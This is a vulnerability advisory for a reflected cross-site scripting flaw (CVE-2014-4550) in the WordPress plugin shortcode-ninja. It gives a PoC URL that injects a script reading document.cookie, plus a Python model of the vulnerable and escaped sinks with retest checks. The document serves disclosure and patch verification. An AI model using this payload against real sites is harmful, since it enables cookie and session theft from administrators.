wp-plugin : shortcode-ninja – A3-Cross-Site Scripting (XSS)

 

Plugin Details

Plugin Name : shortcode-ninja

Affected Version : 1.4 (earlier versions, if any, are most probably affected as well)

Vulnerability : A3-Cross-Site Scripting (XSS)

Identified by : Prajal Kulkarni

Technical Details

Minimum Level of Access Required : Unauthenticated

The shortcode parameter of preview-shortcode-external.php is reflected into the response without output encoding. The percent-encoded value in the PoC below decodes to shortcode'><script>alert(document.cookie)</script>: the leading '> closes the attribute and tag the value is echoed into, and the script element that follows runs in the browser of anyone who opens the link. No login is needed, so this is a classic reflected XSS that can be delivered by sending the URL to an administrator.

PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
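
To make the reflection concrete, the following Python is an added example and not the plugin's code. The sink is a constructed stand-in chosen to match what the payload implies (a value echoed inside a single-quoted HTML attribute; the plugin's real markup is not shown on this page), the URL helper decodes the advisory's PoC the way PHP's $_GET would, and the fixed variant shows the contextual output encoding that neutralises the payload. ADVISORY_POC_URL is the URL above; everything else is constructed for the example.

```python
"""Added example (not the plugin's code): model of the reflected XSS in
preview-shortcode-external.php and a check that the fix actually encodes.

Assumption: the PoC payload begins with "'>", so the plugin presumably
echoes ``shortcode`` inside a single-quoted HTML attribute. That is the
context modelled by the constructed sink below.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# PoC URL exactly as published in the advisory.
ADVISORY_POC_URL = (
    "http://127.0.0.1/wordpress/wp-content/wp-plugs/shortcodeninja/"
    "preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3E"
    "alert%28document.cookie%29%3C/script%3E"
)

# What the percent-encoded query value decodes to.
POC_PAYLOAD = "shortcode'><script>alert(document.cookie)</script>"


def shortcode_param(url):
    """Return the decoded ``shortcode`` query value, as PHP's $_GET would see it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("shortcode", [""])[0]


def build_poc_url(base_url, payload=POC_PAYLOAD):
    """Re-encode a payload into a request URL (round-trips through shortcode_param)."""
    return base_url + "?" + urlencode({"shortcode": payload})


def render_preview_vulnerable(shortcode):
    """Constructed stand-in for the unfixed sink: raw interpolation into an attribute.

    With POC_PAYLOAD the "'>" terminates the attribute and the input element,
    and the <script> element that follows becomes live markup.
    """
    return "<input type='hidden' name='shortcode' value='" + shortcode + "'>"


def render_preview_fixed(shortcode):
    """Same sink with contextual output encoding.

    html.escape(quote=True) encodes &, <, >, " and ' (the PHP equivalent is
    htmlspecialchars() with ENT_QUOTES, or esc_attr() in WordPress), so the
    value can no longer close the attribute it is written into.
    """
    return ("<input type='hidden' name='shortcode' value='"
            + html.escape(shortcode, quote=True) + "'>")


def has_live_script(body):
    """Crude reflection check: an unencoded <script tag in the response body."""
    return "<script" in body.lower()


def escaped_correctly(body, payload):
    """True when the payload appears only in its entity-encoded form."""
    return payload not in body and html.escape(payload, quote=True) in body


if __name__ == "__main__":
    value = shortcode_param(ADVISORY_POC_URL)
    print("decoded payload :", value)
    print("vulnerable sink :", render_preview_vulnerable(value))
    print("fixed sink      :", render_preview_fixed(value))
```

When retesting a patched install, fetch the PoC URL and run the response body through has_live_script() and escaped_correctly(): a fix that strips only "<script>" or only double quotes will still fail the first check with a slightly varied payload, while attribute-context encoding of the whole value passes both.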

 

Disclosure Timeline

Vendor Contacted : 2014-01-21

Plugin Status : Closed on 2014-01-11

Public Disclosure : 2014-04-25

CVE Number : CVE-2014-4550

Plugin Description :

Preview and customize WooThemes shortcodes before inserting them. This plugin
adds the Shortcode Ninja button to the Visual Editor.

Click on the Ninja button and pick one of the many WooThemes shortcodes from the
list. You can set shortcode attributes and see a preview of the result before
inserting the shortcode into the post. The active theme must be from
WooThemes.com with a recent version of the WooFramework installed.

= List of Features =

* **All Shortcodes In One Place**

    No need to memorize all shortcodes. Access all 18 built-in WooThemes shortcodes from the Ninja Button in the Visual Editor.

* **Live Preview**

    Customized shortcode or the default look – either way you see a preview of what the result will look like in the post.

* **Create Column Layouts Like a Pro**

    Decide how many columns you want. Click on the different column sizes to add them. Insert. Done.

* **Automatic Link Validation**

    Gone are the days of broken download links! Ninja link validation is included.

* **Works with all themes from WooThemes.com**

    WooThemes are based on the WooFramework. The framework comes with a huge set of
    shortcodes to create buttons, info boxes, column layouts, social buttons,
    and more.

= Note =

Plugin was tested with WordPress version 2.9.2 to 3.0.1, but may work with older
versions, too.
